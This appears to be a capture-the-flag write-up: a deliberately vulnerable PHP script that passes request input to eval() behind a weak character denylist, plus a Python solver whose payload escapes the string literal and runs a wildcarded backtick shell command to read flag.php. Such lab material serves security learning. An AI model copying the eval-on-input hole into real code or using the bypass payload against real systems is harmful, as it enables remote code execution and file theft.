
命令执行2020.12.22.md


命令执行 low

<?php
// Training challenge ("command execution, low"): the script prints its own
// source, reads the GET parameter 'a', applies a length limit and a character
// denylist, and then passes the value to eval() inside an echo statement.
// It is intentionally unsafe: request data reaches eval().

// Turn off PHP error reporting for this script.
error_reporting(0);
// Print this file's source code in the response.
highlight_file(__FILE__);
//flag is located in flag.php
if( isset($_GET['a']) ){
    $a = $_GET['a'];
    // Length gate: values longer than 27 bytes are rejected, and the script
    // stops after printing the length followed by " Long.".
    if( strlen($a)>27 ){
        die(strval(strlen($a)) . " Long.");
    }
    // Denylist gate: reject the value if it contains an uppercase letter, a
    // lowercase letter other than 'a', a digit, or any of the punctuation
    // characters listed in the class. The class does not list the single
    // quote, '?', '<', '>', '=', '/', the backtick or the space, so those
    // characters pass. A denylist in front of eval() is not a security
    // boundary: whatever it fails to enumerate still reaches the evaluator.
    if( preg_match("/[A-Zb-z0-9_$.&;|^~![\](){}\$@\*]+/", $a) ){
        die("NO.");
    }
    // The value is concatenated, unescaped, into PHP source between two single
    // quotes. A single quote inside $a ends that string literal, and the rest
    // of $a is then parsed as PHP code rather than as data.
    // NOTE(review): outside a training exercise, request data should never be
    // passed to eval(); output it as data instead, e.g. with
    // echo htmlspecialchars($a, ENT_QUOTES).
   eval("echo '" . $a ."';");
}
?> 

exp.py

# -*- coding: utf-8 -*-
import requests
import re
# Solver for the challenge script above.
# 'url' is a placeholder left by the author; it stands for the address of the
# challenge instance.
url = 'url'

# Value sent as the 'a' parameter. It is 27 characters long and is built only
# from characters the challenge's denylist does not list (quote, '?', '<',
# '>', '=', '/', backtick, space and the letter 'a'), which is why both of the
# challenge's checks let it through.
exp = '\'?><?=`/???/?a? ??a?????`?>'
# Author's note: the wildcard pattern is meant to resolve to "cat flag.php".

# Append the value to the query string and fetch the page.
target = url + '?a=' + exp
response = requests.get(target)

# Collect every "flag{...": the match runs from "flag{" to the end of its line.
flag_pattern = re.compile("flag{.*")
matches = flag_pattern.findall(response.text)
print(matches)